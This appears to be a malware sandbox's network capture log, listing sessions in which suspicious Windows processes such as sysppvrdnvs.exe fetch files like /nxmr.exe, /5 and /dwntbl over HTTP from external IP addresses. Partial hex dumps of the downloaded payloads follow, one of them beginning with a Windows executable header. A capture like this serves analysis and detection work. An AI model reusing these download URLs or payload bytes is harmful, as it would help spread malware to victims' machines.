Oct 26, 2024 07:27:09.900993109 CEST	1236	IN	Data Raw: 8c 54 23 d9 2f 57 1f 55 75 be 9b 15 34 db 14 58 20 68 c2 40 f2 66 0e db 0b f4 29 9a cf 5c 58 e8 db 55 3c 3e 0e 29 48 03 72 1c d0 ec 84 a4 3e b0 ab 4d 8f 34 1f c7 01 19 2e 7b e4 98 6f 39 14 98 f0 59 68 8a 69 3d 64 2e 73 e5 2f 9a b6 dd 88 e7 8c 7e Data Ascii: T#/WUu4X h@f)\XU<>)Hr>M4.{o9Yhi=d.s/~(>+s[0p-\|EmzJT,_#L}HQyt{Ja%Z>CIyGIP.]$,;S,yj:tl"s\j8?<;v-#
Oct 26, 2024 07:27:09.901027918 CEST	1236	IN	Data Raw: e2 93 2a 13 2e 4f a8 d5 55 e4 d0 c9 40 82 3a 06 60 23 f4 d8 eb 34 7f 35 2f fe a5 60 f0 93 3a 4a 49 5d 3c 7f 4b b7 cf 44 bb 15 8a 5a 57 64 54 36 61 f0 4d 87 a7 65 70 3e bd 61 a8 d1 af 3c fa 57 bb 79 6d a6 2b ce 4f 64 6b 97 b5 0f 58 11 61 4b cf 59 Data Ascii: .OU@:`#45/`:JI]<KDZWdT6aMep>a<Wym+OdkXaKY;,SPXD@`7Geq NW(EK0s (u\ERH4A\|0JQS=QtAcJ,%Y]*Iw31Zz2
Oct 26, 2024 07:27:09.901063919 CEST	1149	IN	Data Raw: ac 10 0c c7 5a 43 15 b4 ce 65 6e 2e 9c dc e3 c3 2b b7 42 05 d8 5d ef 04 3b 6b d4 ce d8 b9 1f a1 04 2a da 3f 38 05 07 d8 a3 1a ec ca 05 2b 32 6b c1 5c 20 ba 70 0b a4 b8 b5 51 1a 5b d2 9e 72 9b 03 4c 2d 7f 89 5a 05 a6 28 8a 1e 64 2c f1 24 ae 90 87 Data Ascii: ZCen.+B];k?8+2k\ pQ[rL-Z(d,$njhP%YG'93T45NnMb4.]a%%=\]aC:U{zaSy))=noXQ:hSRCoDcW"hK`O$
Oct 26, 2024 07:27:15.997348070 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:16.278253078 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:16 GMT Content-Type: application/octet-stream Content-Length: 13568 Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT Connection: keep-alive ETag: "67179628-3500" Accept-Ranges: bytes Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED] Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ \|Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS\|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D\|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa\|yM{x;!++H.}bpp8h;qLLa<x<j
Oct 26, 2024 07:27:16.278311968 CEST	1236	IN	Data Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\Sk}):rN]WO]1G>&!>dK@i[]LzA)0N$w\|n=29-BB){&ZI2ej` t
Oct 26, 2024 07:27:16.278327942 CEST	1236	IN	Data Raw: f7 13 67 9e cd 6e f9 15 fc 3a cd df 70 8b 42 7b de a4 ca 85 57 6a 71 26 75 81 f0 54 29 ef 09 6e c9 67 f3 87 95 29 ab 8b 20 15 88 7f 2e 3e 35 68 a8 79 d1 4a b4 83 de db 9a ba b6 0b d8 d5 6f f0 69 be 83 27 84 f0 7c a3 ae 2f 39 57 5b 8d 33 ac 48 b0 Data Ascii: gn:pB{Wjq&uT)ng) .>5hyJoi'\|/9W[3H8 lyac&_ n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s']@-:N

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49982	185.215.113.84	80	1316	C:\Users\user\AppData\Local\Temp\1332331323.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:15.037730932 CEST	177	OUT	GET /nxmr.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Host: 185.215.113.84
Oct 26, 2024 07:27:15.959039927 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:15 GMT Content-Type: application/octet-stream Content-Length: 5827584 Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT Connection: keep-alive ETag: "66f70fa2-58ec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
Oct 26, 2024 07:27:15.959095955 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1 Data Ascii: Df.H(HuX1HvXHyXHXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p
Oct 26, 2024 07:27:15.959104061 CEST	1236	IN	Data Raw: fd ff ff 89 c1 e8 2b 6d 01 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 c5 ac 58 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 a5 ac 58 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 Data Ascii: +mf.H(HXH(H(HXH(H(lHH(H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfH
Oct 26, 2024 07:27:15.959120989 CEST	1236	IN	Data Raw: d6 4c 89 c5 4d 89 cc 48 8d 7c 24 20 41 b8 08 02 00 00 ba 00 00 00 00 48 89 f9 e8 9a 68 01 00 4d 89 e0 48 89 ea 48 89 f9 e8 34 28 00 00 89 f2 48 89 d9 e8 35 fe ff ff 41 89 f0 48 89 da 48 89 f9 e8 c8 35 00 00 90 48 81 c4 30 02 00 00 5b 5e 5f 5d 41 Data Ascii: LMH\|$ AHhMHH4(H5AHH5H0[^_]A\UWVSHH)H$8H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Z
Oct 26, 2024 07:27:15.959163904 CEST	1236	IN	Data Raw: 7c 01 00 00 67 00 66 c7 84 24 7e 01 00 00 93 00 66 c7 84 24 80 01 00 00 a7 00 66 c7 84 24 82 01 00 00 a6 00 66 c7 84 24 84 01 00 00 ae 00 66 c7 84 24 86 01 00 00 9c 00 66 c7 84 24 88 01 00 00 a9 00 66 c7 84 24 8a 01 00 00 aa 00 66 c7 84 24 8c 01 Data Ascii: \|gf$~f$f$f$f$f$f$f$f$f$f$f$ef$f$f$f$7=Xu<XHXDPfAHH'unXHm=Xt
Oct 26, 2024 07:27:15.959181070 CEST	960	IN	Data Raw: 01 00 00 1a 00 66 c7 84 24 54 01 00 00 36 00 66 c7 84 24 56 01 00 00 30 00 66 c7 84 24 58 01 00 00 3f 00 66 c7 84 24 5a 01 00 00 3c 00 66 c7 84 24 5c 01 00 00 40 00 66 c7 84 24 5e 01 00 00 3c 00 66 c7 84 24 60 01 00 00 33 00 66 c7 84 24 62 01 00 Data Ascii: f$T6f$V0f$X?f$Z<f$\@f$^<f$`3f$bAf$df$f$f$h6f$j;f$l1f$n<f$pDf$r@f$tf$v f$x2f$z0f$\|Bf$~?f$6f$
Oct 26, 2024 07:27:15.959196091 CEST	1236	IN	Data Raw: e0 58 00 48 8d 8a 60 04 00 00 0f b7 02 66 2d ed 10 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 61 e4 58 00 00 4c 8d 84 24 00 10 00 00 48 8d 94 24 20 14 00 00 48 8d b4 24 c0 07 00 00 48 89 74 24 30 48 89 74 24 28 4c 89 44 24 20 4c 8d 0d Data Ascii: XH`f-f%fHH9uaXL$H$ H$Ht$0Ht$(LD$ LXC"H$HiZHzHc5f$Pf$Rf$Tf$Vf$Xf$Zf$\f$^f$`f$b
Oct 26, 2024 07:27:15.959211111 CEST	1236	IN	Data Raw: 00 da 00 66 c7 84 24 5c 01 00 00 e0 00 66 c7 84 24 5e 01 00 00 da 00 66 c7 84 24 60 01 00 00 67 00 80 3d 8d d8 58 00 00 75 3c c6 05 a6 d8 58 00 01 b8 00 00 00 00 48 8d 0d 88 d8 58 00 0f b7 94 44 50 01 00 00 66 89 14 41 48 83 c0 01 48 83 f8 09 75 Data Ascii: f$\f$^f$`g=Xu<XHXDPfAHHu[XH=jXt)HOXHJfOf%fHH9u?XL&XL$H=Xu>XfXUfXJfXOfXX
Oct 26, 2024 07:27:15.959239006 CEST	1236	IN	Data Raw: e8 6c e4 ff ff 80 3d f5 cf 58 00 00 74 29 48 8d 15 e4 cf 58 00 48 8d 4a 08 0f b7 02 66 05 a3 17 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 ca cf 58 00 00 48 8d 15 93 d3 58 00 48 8d 0d b4 cf 58 00 e8 e7 50 01 00 89 c3 85 c0 0f 85 ff 02 Data Ascii: l=Xt)HXHJff%fHH9uXHXHXP@HH[^_]H$PA#QfD$`fD$bfD$dfD$ffD$hfD$jfD$lfD$nfD$p=}Xu9XHpXTD`fAHHu
Oct 26, 2024 07:27:15.959255934 CEST	1236	IN	Data Raw: ff e9 83 fb ff ff 4c 63 0d c0 47 58 00 4c 8d 05 b9 cd 03 00 eb a4 48 8d 54 24 5c 48 8d 8c 24 d0 09 00 00 e8 bc 18 00 00 48 89 c2 48 8d 8c 24 c0 07 00 00 44 8b 44 24 5c e8 ec 19 00 00 48 8d 8c 24 50 01 00 00 41 b8 08 02 00 00 ba 00 00 00 00 e8 80 Data Ascii: LcGXLHT$\H$HH$DD$\H$PALfD$`fD$bfD$dfD$ffD$hfD$jfD$lfD$nfD$pfD$rfD$tfD$vfD$xfD$zU=XC=Xt)HyXHJf-U8f%fHH9us
Oct 26, 2024 07:27:15.964611053 CEST	1236	IN	Data Raw: c5 da ff ff 80 3d 90 d5 58 00 00 74 2c 48 8d 15 c5 d4 58 00 48 8d 8a c2 00 00 00 0f b7 02 66 05 3b 2f 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 62 d5 58 00 00 48 8d 05 99 d4 58 00 48 89 84 24 68 04 00 00 66 c7 84 24 52 04 00 00 09 02 Data Ascii: =Xt,HXHf;/f%fHH9ubXHXH$hf$RfD$@fD$BfD$DfD$FfD$HfD$JfD$LfD$NfD$PfD$RfD$TfD$VfD$X=Xu9XHXTD@fAHHuXH=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49984	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:17.300954103 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:18.192478895 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:18 GMT Content-Type: application/octet-stream Content-Length: 13568 Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT Connection: keep-alive ETag: "67179628-3500" Accept-Ranges: bytes Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED] Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ \|Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS\|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D\|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa\|yM{x;!++H.}bpp8h;qLLa<x<j
Oct 26, 2024 07:27:18.192493916 CEST	1236	IN	Data Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\Sk}):rN]WO]1G>&!>dK@i[]LzA)0N$w\|n=29-BB){&ZI2ej` t
Oct 26, 2024 07:27:18.192500114 CEST	224	IN	Data Raw: f7 13 67 9e cd 6e f9 15 fc 3a cd df 70 8b 42 7b de a4 ca 85 57 6a 71 26 75 81 f0 54 29 ef 09 6e c9 67 f3 87 95 29 ab 8b 20 15 88 7f 2e 3e 35 68 a8 79 d1 4a b4 83 de db 9a ba b6 0b d8 d5 6f f0 69 be 83 27 84 f0 7c a3 ae 2f 39 57 5b 8d 33 ac 48 b0 Data Ascii: gn:pB{Wjq&uT)ng) .>5hyJoi'\|/9W[3H8 lyac&_ n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s
Oct 26, 2024 07:27:18.192503929 CEST	1236	IN	Data Raw: ac 27 8b 18 ae bb 5d 87 aa b3 db 40 94 0e 2d 3a 4e fb 12 dd 3d f2 dd d2 dd a3 72 80 4d 76 81 af 56 a9 06 82 ae ff 8a 79 49 37 1c a2 b7 3a 25 ed f2 08 ab 4d 8e dd 95 b1 5a 7d 61 fb d3 0b d2 02 20 1c 85 9c e0 7f 4f c5 61 59 a6 ae e5 06 da f9 cf f8 Data Ascii: ']@-:N=rMvVyI7:%MZ}a OaYrPQ;\|<5c0aFh){B9hT-\|`56el/9uLltfDO\|CVi-\|R)rhc
Oct 26, 2024 07:27:18.192517996 CEST	1236	IN	Data Raw: 9f 7a be d0 c0 38 dc 6c 17 43 1e 74 6c 00 69 b0 8d 22 0a 73 79 98 ca 5f 43 59 c7 44 73 8d 02 a0 d3 49 7e 61 8a bd dc b0 82 db 37 0b 45 a1 57 3c 51 92 f5 a2 fc aa c2 9b 3a 89 7a e3 e8 0c cd c5 9c 06 84 c4 a4 02 d8 fa 5c f3 c2 d1 d8 b2 fa af ce 82 Data Ascii: z8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpTn[/Ar"6k=G]5-[<FMBL]T"vV@#>:LkEIBIqI("'%Of1]<
Oct 26, 2024 07:27:18.192524910 CEST	424	IN	Data Raw: 53 ec 08 6d 77 87 ce ab f8 b4 8d 12 03 c2 d0 fc 32 58 ac ae c2 7d a6 ff 67 7c d6 bd 35 b0 14 41 eb 84 7f cc e3 42 77 6f 3d 2f e4 e7 77 5d a6 ee 11 a8 b8 42 97 f2 5a d3 93 6e e3 01 36 1e 1b d9 3d 8e 5a 07 fc 0e eb 90 bc 84 d2 06 dc f1 21 e6 6f d5 Data Ascii: Smw2X}g\|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w3M?8LBTa5Mr(*BDh)(l?ISrmXlv YF{R`[Rxi`Zi#?vm
Oct 26, 2024 07:27:18.192537069 CEST	1236	IN	Data Raw: 74 f3 ac 90 98 b6 ff fc 92 57 3b 59 3f b8 ed 21 76 08 9e b1 f6 29 22 41 7c 6b cd 4f ea 1c 42 9c 35 e8 32 9a 15 a4 15 52 7d dc 83 6b bb 09 f3 09 24 73 e5 2f 0e bb 51 97 96 06 36 8d db f8 cc 39 e3 b7 41 e9 ea ac 0a eb 02 94 4e fa 45 f0 3c 67 60 31 Data Ascii: tW;Y?!v)"A\|kOB52R}k$s/Q69ANE<g`1YcbCg={8[]Mm~Hsk23{\|D7'3-L?Q*wAH--G7\|L0P](S?UvgvCF70H.s&46Ha)\$!
Oct 26, 2024 07:27:18.192543983 CEST	1236	IN	Data Raw: d9 7a a9 14 17 2e ae c1 e9 28 0e 98 27 d8 ff 87 f3 f1 58 10 d0 b7 02 ae 7e 82 1e 6c da ef ea e6 27 14 af b5 2d 57 26 7b 86 1d a2 9b d4 7f ae 95 16 c0 14 e8 40 28 50 fd 6c cf af 25 95 40 07 ce 25 f9 b1 26 fa fd 67 7e 6a 31 2f d5 fd b0 7b 9b a7 eb Data Ascii: z.('X~l'-W&{@(Pl%@%&g~j1/{9RG"$(!G3_Q+#\|RT<Vf:]}N`P~\|Nh-{9{S5UG,BkTTwv}b&#T%[<9CVd>U
Oct 26, 2024 07:27:18.192553997 CEST	24	IN	Data Raw: 59 79 20 7d a8 58 b4 d8 1e b8 cb 65 f8 eb 32 c3 d1 f5 85 fe 39 25 57 04 Data Ascii: Yy }Xe29%W
Oct 26, 2024 07:27:18.192588091 CEST	1236	IN	Data Raw: 40 52 23 33 33 5c 83 c7 ff 81 14 e9 1f aa fe 32 d8 0b 78 48 44 77 c0 a5 ce 8a 15 96 54 af 80 e1 36 58 a0 21 e3 22 11 88 90 3b 84 52 10 53 7b 74 8c 4f e3 5c c7 3e b2 aa 3a 24 9e f1 e1 7e f2 99 40 d7 77 21 2e de a9 a2 09 6b 30 af 0f 9e 83 d6 b9 2e Data Ascii: @R#33\2xHDwT6X!";RS{tO\>:$~@w!.k0.nCh<Hf{wGAO#NQgo=\|96D&FImiX%feP:Ahg83Hn!cqiW3a{;<jJi.4nQ^tg61lAJ
Oct 26, 2024 07:27:18.198000908 CEST	1236	IN	Data Raw: 9d 37 6c af e7 6c 2a d0 a0 ad 7d 87 93 7d 32 92 a7 5d 99 4a c6 00 2d e9 ba b4 dc 8e e2 71 02 55 f5 b9 df 74 74 ce a4 19 2e cb 9b 65 2c 84 77 8a bb 3d 93 a8 79 b3 33 5d 4a b6 c4 15 83 dd 1a 7f 7c f5 ca 4b 5f 75 1f ba 99 6a 97 05 2e 66 62 f9 50 87 Data Ascii: 7ll}}2]J-qUtt.e,w=y3]J\|K_uj.fbPO^\? A&.TiVYx0d7utnIC[Lb#i61B@+S"Q(d`5Z623y\|)_5,I#8\I2*b-s\o5:.K/5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49985	91.202.233.141	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:17.676508904 CEST	171	OUT	GET /dwntbl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Oct 26, 2024 07:27:18.592185020 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:18 GMT Content-Type: application/octet-stream Content-Length: 85760 Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT Connection: keep-alive ETag: "670784fe-14f00" Accept-Ranges: bytes Data Raw: 73 9b e7 57 5d 0f d3 d2 df 96 5f cd 0b 7c 4f ed 0c 59 d0 57 11 1e d2 e1 d7 80 f2 d5 71 10 6a 2a 87 07 22 a6 6e cb ec f0 12 2b 90 48 7c 5c 16 07 b9 45 84 db 5b 0a 45 14 0a 85 27 cc d7 59 7c da 9a 7b 65 fc bd 3a fa 59 0e 93 5d 05 00 75 cc 1f a7 e0 58 a4 00 6a 1d 1a 9d b3 52 e6 b5 0f 65 00 37 82 7e 11 70 29 d8 ff d3 7f 78 7e e8 6a b3 03 74 22 aa 75 0a 3e 4e 93 86 8f b5 6a 07 3e c5 d8 6b 40 22 08 93 91 df a9 65 51 ba ae b8 e0 c8 6f 4e 8c ac e2 9d 3b 24 34 1b 93 8f f4 78 b3 6e 76 b5 c4 13 f7 e3 32 60 41 bf 53 cc 98 0b f3 1a bf 74 bd 52 b8 1c 29 4f e9 c4 e2 82 d4 b2 f8 b7 0a 11 b2 be a8 25 a0 53 0e d1 ce da 31 eb 63 a9 59 c5 1f 8a d9 02 58 af ae c8 c9 d4 fa d3 e8 9f 75 1b 4e af 82 94 08 2a 54 0b 9a 60 cf 58 b6 57 56 bd c6 0a 54 8a e6 70 e6 66 05 db 03 84 b9 2b 25 e7 7b 25 5d 50 e3 db c0 7a dc 3b dd 8d e0 cf f1 1f e1 7a ed 83 b6 92 25 c6 22 b1 a6 c3 ae 1b b6 56 0f 7a 67 5a 13 cb 6a f1 c9 f6 7f eb a8 9e 1a 49 3b fa 62 7a f9 8f 2e 10 81 4d 4d 62 d8 b2 c0 62 35 68 1b e3 19 6d 92 6f e9 25 00 d2 91 21 07 4d 9d [TRUNCATED] Data Ascii: sW]_\|OYWqj"n+H\|\E[E'Y\|{e:Y]uXjRe7~p)x~jt"u>Nj>k@"eQoN;$4xnv2`AStR)O%S1cYXuNT`XWVTpf+%{%]Pz;z%"VzgZjI;bz.MMbb5hmo%!Mt0xpg&v2Hoc:?W{6FV#m_Mo24)OW#E>?WiUV#p{%I}hb$lm1s^z'4{spxWP?QE)!U:07(t60pwah_4\N}c\|]{cV'yfd.CI:U+Q"fyO9/f}mL{ZO$E).6$dtc?1>H'4U^<W%,1%((180aqv!kxX-\|M1Z^\oqyq].{~}D7K{2auOWa["E?!DS*ySexPJ K@~nZH/MY"tZO\|nNuX\^s-[a[3Ks-@5zH\|{I uU
Oct 26, 2024 07:27:18.592216015 CEST	1236	IN	Data Raw: 80 b5 d7 f9 5b 0f c6 8c 89 48 4e a5 7d ec ec b7 81 41 9b e2 ba 5a 73 79 30 a4 03 3d 69 39 77 3a b5 22 f0 12 25 1c 3b 8d 3d 2a 07 fb 31 ad 6b 58 9c f7 38 e5 76 eb 84 dd 18 91 5c 0c 56 9e 5f 05 39 22 e3 c8 e5 8d 0b eb 2a 4d f3 0f 23 8b eb 23 4b db Data Ascii: [HN}AZsy0=i9w:"%;=1kX8v\V_9"M##K5sN:$!;3*`Nj=g4;N)TJ9E+&}TrUDJ^J3[PO<utH?u%
Oct 26, 2024 07:27:18.592236996 CEST	1236	IN	Data Raw: 4f 01 2b ed 3e 8d 0a 28 fd 86 a8 c1 f8 c9 ff 2c 83 0b c0 df 28 08 0a 68 a7 d6 bc 7f 84 88 04 d8 bb a1 b4 e2 13 e6 e4 f2 17 49 14 c4 50 f9 f5 18 a2 ec 8d fd 05 45 b1 83 b3 96 3f b0 42 05 3d 49 9d 59 63 97 2e 71 e6 28 37 1f 33 7b 73 68 a1 fb 7f 3e Data Ascii: O+>(,(hIPE?B=IYc.q(73{sh>=1I4M2tHdT?GI0)}g`f2[&gU" +1B w[ \o]4VpO3m:&xDrCg7"KctAPFF+X&JR
Oct 26, 2024 07:27:18.592242956 CEST	636	IN	Data Raw: 9c 9b 32 f7 89 0e 26 33 e4 db 73 cb 44 c8 ad 4b 2a 03 96 c0 75 08 ab f6 68 d0 09 8a d4 c7 cb 4f 1a bb 8b fc bd 6d 65 ef e2 0d 34 ca 1f 62 0e 5e dd 6d 62 54 8c ed e2 a7 b0 66 33 7e 49 b1 97 44 23 e6 fc 48 5c 3d 53 ab c3 82 1a ad f2 40 c4 dd 36 df Data Ascii: 2&3sDK*uhOme4b^mbTf3~ID#H\=S@6HwC2p%7S)u~ycWwhh&rd7<1CI>TO.kP+Qr5nR^qwK.pN_`c1\|oZUQz6m..
